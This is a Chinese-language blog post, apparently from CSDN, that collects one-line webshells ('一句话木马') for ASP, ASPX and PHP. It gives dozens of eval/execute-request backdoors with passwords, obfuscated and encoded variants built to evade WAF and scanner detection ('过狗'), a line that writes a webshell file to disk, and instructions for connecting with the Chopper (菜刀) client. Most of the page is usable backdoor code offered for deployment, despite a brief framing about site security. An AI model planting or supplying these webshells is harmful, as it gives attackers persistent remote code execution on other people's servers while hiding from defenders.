AG一句话木马总结

本文详细介绍了ASP、PHP和ASPx的一句话木马,包括Unicode加密方式、密码及绕过技巧。还探讨了如何利用这些木马进行远程控制,并提到了密码如'webadmin'、'abcd'和'AG'。同时,强调了理解木马工作原理和变异的重要性,以加强网站安全防护。
摘要由CSDN通过智能技术生成

asp一句话木马

<%eval request("AG")%>
<%execute request("AG")%>
<%execute(request("AG"))%>
<%execute request("AG")%><%'<% loop <%:%>
<%'<% loop <%:%><%execute request("AG")%>

"%><%execute(request("AG"))%><%' 

AGSEC"%><%eval request("AG")%><%'

<%execute request("asgec")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("agsec"))</script>
<%Eval(Request(chr(35)))%> 

<%ExecuteGlobal request("AG")%>

过狗
**

<!–#include file=”dama.txt”–>
if Request("AG")<>"" then ExecuteGlobal request("AG") end if
//容错代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {
   '名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

**

//使用冰狐一句话客户端链接

程序代码

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

程序代码

过狗的一句话

<%E=request("AG")%>
<%Y=request("AG")%> 
<%execute(AG)%>
<%Y=request("AG")%> <%execute(Y)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("ag"))%>

这个是90发的

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

密码-7

加密一句话木马 可在此基础上变异 !

全部数字减13,然后十进制解密

<script>
var sun=[73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,78,84,47,54,50,75];
var temp=new Array();
for(var i=0;i<sun.length;i++)
{
   
         temp.push(sun[i]-13);
}
var bk=“”;
for(i=0;i<temp.length;i++)
{
   
         bk+=String.fromCharCode(temp[i]);
}
alert(bk);
</script>

运行后得到代码为

<%execute request(AG)%>

以下这个ASP一句话,也许是你见都没见过的!

<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>

无防下载表,有防下载表可尝试插入以下语句突破的一句话

<%execute request("AG")%><%'<% loop <%:%>
<%'<% loop <%:%><%execute request("AG")%>
<%execute request("AG")'<% loop <%:%>

备份专用

<%eval(request("1")):response.end%>
<%execute(request("1"))%>

可以躲过雷客图的一句话。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用’<,>'的asp一句话

<script runat=server>execute request("agsec")</script>

不用双引号的一句话。

<%eval request(chr(35))%>

一句话木马多种写法木马

<%Y=request("a")%><%execute(Y)%>  
   
<%eval request("AG")%>
 

<%execute request("AG")%>
 

<%execute(request("AG"))%>

<%A=request("AG")eval A%>

<%If Request("AG")<>"" Then Execute(Request("AG"))%>
 

<%if request ("AG")<>""then session("AG")=request("AG"):end if:if session("AG")<>"" then execute session("AG")%>
 

<SCRIPT language=VBScript runat="server">execute request("AG")</SCRIPT>
 

<%@ Page Language="Jscript"%>

<%eval(Request.Item["AG"],"unsafe");%> 

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("AG"))%>

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

密码:z

dim play
'
'
''''''''''''''''''
'''''''''

play = request("never")

%>
what's your name
<%
execute(play)

%>

<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

菜刀一句话密码:我爱你

<%Execute(DeAsc("%119%136%115%126%50%132%119%131%135%119%133%134%58%52%116%115%133%119%52%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>

pass:base

<%
dim x1,x2
x1 = request("h")
x2 = x1
eval x2
%>
<!-- yes++ -->

Unicode加密 ┼癥污爠煥敵瑳∨≡┩> 密码:a
Unicode加密 ┼癥污爠煥敵瑳∨≧┩> 密码:g
Unicode加密 ┼攠數畣整爠煥敵瑳∨∣┩愾 密码:#
Unicode加密 ┼攠數畣整爠煥敵瑳∨≡┩> 密码:a

PHP一句话木马

<?php eval($_POST[AG])?>

<?php @eval($_POST[AG])?>
           //容错代码

<?php assert($_POST[AG]);?>
         //使用lanker一句话客户端的专家模式执行相关的php语句

<?$_POST['AG']($_POST['AG']);?>


<?$_POST['AG']($_POST['AG'],$_POST['AG'])?>

<?fputs(fopen("AG.php","w"),'<?php eval($_POST["AG"]);?>');?>
//本目录下,访问ag.php,用菜刀连接密码:AG

<O>h=@eval($_POST[AG]);</O>

高强度密码:

<?php substr(md5($_REQUEST['AG']),28)=='acd0'&&eval($_REQUEST['AG']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 AG

<?php assert($_REQUEST["AG"]);?> //菜刀连接 躲避检测 密码AG

<script language="php">@eval($_POST[AG])</script>

//绕过<?限制的一句话

过狗

<?php require_once (“dama.txt”); ?> 

这两个是来自国外的。
站长注意一下了。
第一种:1.php

<?=(])?>
在菜刀里写http://127.0.0.1/1.php?2
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值